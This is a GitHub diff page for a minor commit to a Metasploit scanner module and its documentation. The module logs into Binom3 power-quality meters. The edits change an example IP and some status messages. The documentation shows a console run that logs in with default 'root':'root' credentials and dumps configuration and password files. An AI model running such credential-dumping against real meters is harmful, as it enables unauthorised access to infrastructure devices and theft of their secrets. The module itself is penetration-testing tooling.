File tree Expand file tree Collapse file tree 2 files changed +5
-5
lines changed
documentation/modules/auxiliary/scanner/http
modules/auxiliary/scanner/http Expand file tree Collapse file tree 2 files changed +5
-5
lines changed Original file line number Diff line number Diff line change @@ -11,19 +11,19 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual
11
11
12
12
```
13
13
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump
14
- msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.2 .3.4
14
+ msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.3 .3.7
15
15
msf auxiliary(binom3_login_config_pass_dump) > run
16
16
17
- [+] 1.3.3.7:80 - Running Binom3...
17
+ [+] 1.3.3.7:80 - Binom3 confirmed ...
18
18
[*] 1.3.3.7:80 - Trying username:"root" with password:"root"
19
19
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "root":"root"
20
20
[+] ++++++++++++++++++++++++++++++++++++++
21
- [+] #{rhost} - dumping configuration
21
+ [+] 1.3.3.7 - dumping configuration
22
22
[+] ++++++++++++++++++++++++++++++++++++++
23
23
[+] 1.3.3.7:80 - File retrieved successfully!
24
24
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_Binom3_config_165927.txt
25
25
[+] ++++++++++++++++++++++++++++++++++++++
26
- [+] #{rhost} - dumping password file
26
+ [+] 1.3.3.7 - dumping password file
27
27
[+] ++++++++++++++++++++++++++++++++++++++
28
28
[+] 1.3.3.7:80 - File retrieved successfully!
29
29
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000004_moduletest_1.3.3.7_Binom3_passw_010954.txt
Original file line number Diff line number Diff line change @@ -95,7 +95,7 @@ def is_app_binom3?
95
95
96
96
if ( res && res . code == 200 && res . headers [ 'Server' ] && ( res . headers [ 'Server' ] . include? ( 'Team-R Web' ) || res . body . include? ( 'binom_ico' ) || res . body . include? ( 'team-r' ) ) )
97
97
98
- print_good ( "#{ rhost } :#{ rport } - Running Binom3..." )
98
+ print_good ( "#{ rhost } :#{ rport } - Binom3 confirmed ..." )
99
99
100
100
return true
101
101
else
You can’t perform that action at this time.
0 commit comments